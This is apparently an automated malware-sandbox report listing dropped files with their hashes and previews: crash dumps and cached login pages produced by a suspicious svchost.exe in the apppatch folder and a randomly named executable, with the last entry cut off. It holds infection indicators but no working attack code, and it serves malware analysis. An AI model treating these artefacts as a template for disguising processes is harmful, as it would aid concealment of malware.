Preview:	MDMP..a..... .......I;2g.........................................>..........T.......8...........T...........0!...?..........P...........<...............................................................................eJ..............GenuineIntel............T............;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER53A2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.713928219998161
Encrypted:	false
SSDEEP:	192:R6l7wVeJWE6x6Y2DESU99JgmfZpprA89bLUsfO5m:R6lXJN6x6Y5SU9zgmfZpLHfh
MD5:	DD69EB789EE1FA3988B9D286A7DA9621
SHA1:	B1580E585341AD895B89B6652A85ECE44E86C70E
SHA-256:	C2E4A12C6A9CFAB85298471439EDF7F1CF43AE8BBDA4DD7AD60A0D19263B1EE7
SHA-512:	8B15427421EC1190849D304D1D702B9254E8307F645036E05D91BD2DC92366A5BDC9090E46F1ADD53C5C5B0EA856F761EAE0CE0152EA54F65AD4821494958EE9
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER546E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.528561139464415
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYGYm8M4JIGFU+q8hQ0289d:uIjfPI7zD7VmJezj89d
MD5:	9254BF9D5BFFFD3B659F485500F20CCC
SHA1:	A3F8B58A277E4432EADDF76F04F0C7048394214E
SHA-256:	1D7EC888485E6BE3B26F45DBA3C0BFD7EF02A2F25420BC98BF6A80012202B938
SHA-512:	269E0CD90975458A2EC822540CF6AF0DCCEF591B1DC078B5CE1BC833213D1D4D47EB34666DBD4F35251CC4099EC1B1A5769C9690E3DBF0F5AB0F0B5A6B5016A0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A96.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	881872
Entropy (8bit):	1.7642189988115706
Encrypted:	false
SSDEEP:	1536:OfOyZUqVwrfQaPvJWKoFEM3/PVnlakdFFqgXDVd2m7aKqPd0lweHKYIt:OQqVwrf3gbj3/PikhqgXDKdc5nIt
MD5:	859FF89F8880E33BE92B60082EF8C637
SHA1:	9AAE4B5DB783DB3A9C3085AA5F66663455E64198
SHA-256:	FE9261F6A51448D511CEB273EBA4CF2729B2218F3D677146B5FD83BB46FCB3FA
SHA-512:	BA8F1C296A9407198A8768B07024D580359E0367C1505FE4252878888490E13C011013EEA8DBF5706674E79B576EA97F7BE40551D60F22C3B0B9896574089F18
Malicious:	false
Preview:	MDMP..a..... .......K;2g...................................../...A..........T.......8...........T............u..............x/..........d1..............................................................................eJ.......1......GenuineIntel............T............;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D94.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 11 17:13:48 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	73266
Entropy (8bit):	2.025493558061615
Encrypted:	false
SSDEEP:	384:24tQOrMpO3QjpXsYK/gzp7tjnWs2dzie2MmvQC7+Nn18:XLrMpOAjXdCsw2e2MSKn
MD5:	00AB04236DFEEDB7BF8496FAB6DBB026
SHA1:	6C6B20A2B7CCD527F605DC5F74F6886D9E9AD110
SHA-256:	931DA9F5B1F60E51770F644642045C9302445A996E5E3AB78DB0AE4FA7D07ADA
SHA-512:	34E4AE4E2B6C595EB049782F4271CA6BCD1802CDB3D8A6951C9F5180AAD4C214315F44C0887DE0EB1E89C48BE0039522BFD38AB3815A7A98344D79E6BA03949B
Malicious:	false
Preview:	MDMP..a..... .......L;2g............$...............,.......D....5..........T.......8...........T...............j.......................................................................................................eJ......D.......GenuineIntel............T.......X....;2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EBE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8368
Entropy (8bit):	3.7113571262067184
Encrypted:	false
SSDEEP:	192:R6l7wVeJ/P6Qe6Y2DnSU9PxgmfZppr989beDsfQqm:R6lXJX6B6YaSU9ZgmfZueof8
MD5:	A669DFA31BFA06A43A95F4B4FAEA0096
SHA1:	F493358D4DDC7B4758A54EC893E9DACFA7D0FF00
SHA-256:	869B61B30B67E87E34232AE833B3393527CD67AA384BB8698DD7CC91B0621EF0
SHA-512:	CA22D2544712D6CD9C9206889059916D97E31CA85374F6619D0934E8D9A39BD7A15B5582AD47BD398208D322AF4210CBD7BC46288A7C43F72C8927DC0512E9E8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F5B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.528968121281205
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VY8PYm8M4JIGFOeaj+q8h7Q028Xd:uIjfPI7zD7VxSJk4Qj8Xd
MD5:	9A095086CD51591B713C04628B76C546
SHA1:	1B12A965BCC2427E752D2080E33E874F234E4252
SHA-256:	73BE97A767E580B5AAB0EE315E60F2BADBB265BF7DDD71BAA448116C596DC8A2
SHA-512:	539BAD5A40C784BD900AD63F368B08D67F7D5653638D318423706CCD9E4FFAA0722FE9785BAE8973F2D69FF92F328AF211908AA03A988E4A5CD0D8BF53558705
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F89.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8376
Entropy (8bit):	3.7094310010197984
Encrypted:	false
SSDEEP:	192:R6l7wVeJrp6QhY16Y2DPSU9shWwgmfZpprQ89beQsfvAqm:R6lXJV6UY16YCSU9gWwgmfZZejfvs
MD5:	8886DA83FAFF0689EF4AA135C32851CF
SHA1:	8CC5DDA506220D90DBF1A893FFA20BABA04B7D18
SHA-256:	7A4383D72EA8CB8DDDD888659307FE19F4B88DED7C926981DE7D3BAB50E5B8DA
SHA-512:	58C9EF3C40DE16B17C962499DEB99307631DF7E8D76E2F33C4C38623968C6518B7F9B8345C2531B71978E8721CF6C419F182ACC043BCC7F4036697F31E5BF49C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.3.6.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FE8.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4634
Entropy (8bit):	4.529495403959855
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9lCWpW8VYgYm8M4JIGFf+q8hn028Md:uIjfPI7zD7VwJlQj8Md
MD5:	26DCFC7C4CCFF9F3D1F5B2EC9B105259
SHA1:	B9A4FECCBC9F8EEAE83F017EC7B8E43641998B0C
SHA-256:	E060E056FDB7C5316BAA351B8D26F149375726F793C4C3B0B30A5E12ADB7FEA5
SHA-512:	51AE52C0D7A9A4FCAFF8A8B468722A8B8A3501FBFC0E9F5FBFA7E608CAD6545E82423387601B6EF6FA90A16E7BE00AFAD6EBA8E7C57F1C89033A7699FCAB18D7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\login[1].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.43530643106624
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
MD5:	4F8E702CC244EC5D4DE32740C0ECBD97
SHA1:	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
SHA-256:	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
SHA-512:	21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\login[4].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[1].htm

Download File

Process:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	43338
Entropy (8bit):	6.058731865978793
Encrypted:	false
SSDEEP:	768:CiBtrifZVO7Wg3hIBYS0NY7JXw9/uRoky7k3QeBzdiGPtYbcq:C8Cg3LKFw9/uRoZkdpZPtYbcq
MD5:	3698B54812E99754AA821DC513C2549D
SHA1:	BCDA06C9F48C343BAE7B4C9D9B4FC9DB4E06C221
SHA-256:	A5DDC1999AC7DB2B72D12F043AB3C413B43BE06C13E33AD24E2FD2237E3642FC
SHA-512:	DC325F528A3721F47088DADEB24225464890C262E85F1A74799FBF7DC65E97CE6671AA72853A48B31913F9B5955AE3EDEE035DF01AB1F5B6610ABFADF27ED50C
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	dropped
Size (bytes):	114
Entropy (8bit):	4.802925647778009
Encrypted:	false
SSDEEP:	3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
MD5:	E89F75F918DBDCEE28604D4E09DD71D7
SHA1:	F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
SHA-256:	6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
SHA-512:	8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
Malicious:	false
Preview:	<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[3].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[5].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	dropped
Size (bytes):	114
Entropy (8bit):	4.802925647778009
Encrypted:	false
SSDEEP:	3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
MD5:	E89F75F918DBDCEE28604D4E09DD71D7
SHA1:	F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
SHA-256:	6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
SHA-512:	8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
Malicious:	false
Preview:	<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	43360
Entropy (8bit):	6.066309366382927
Encrypted:	false
SSDEEP:	768:CiBtrifZVO7Wg3hIBYLyXY7JXOy3WFHD3WFH23WFHv3WFHu3WFHrgrX2jRhdiGPi:C8Cg3OkFOyUjUWUPUOU8rXAzZPtYbcq
MD5:	B633E557FB0C0F1980F8F4CD0C6CF10E
SHA1:	7766AE3D8C8E11A4AB5B3AA7CB177431EE172D9B
SHA-256:	0177E84B98063467D4763E50DFA3A904C842426BA2C6BEBD94274F8280ECD26D
SHA-512:	218D2E83019DBDEE5551B046AA0A3E615A634D88F436707B58009ED9737A9E28F15DAFAF5CB07533E9F5AD0C177D60FCF9A729C5C16E507D15E1D8266783E2B9
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[3].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.43530643106624
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
MD5:	4F8E702CC244EC5D4DE32740C0ECBD97
SHA1:	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
SHA-256:	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
SHA-512:	21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[4].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[6].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
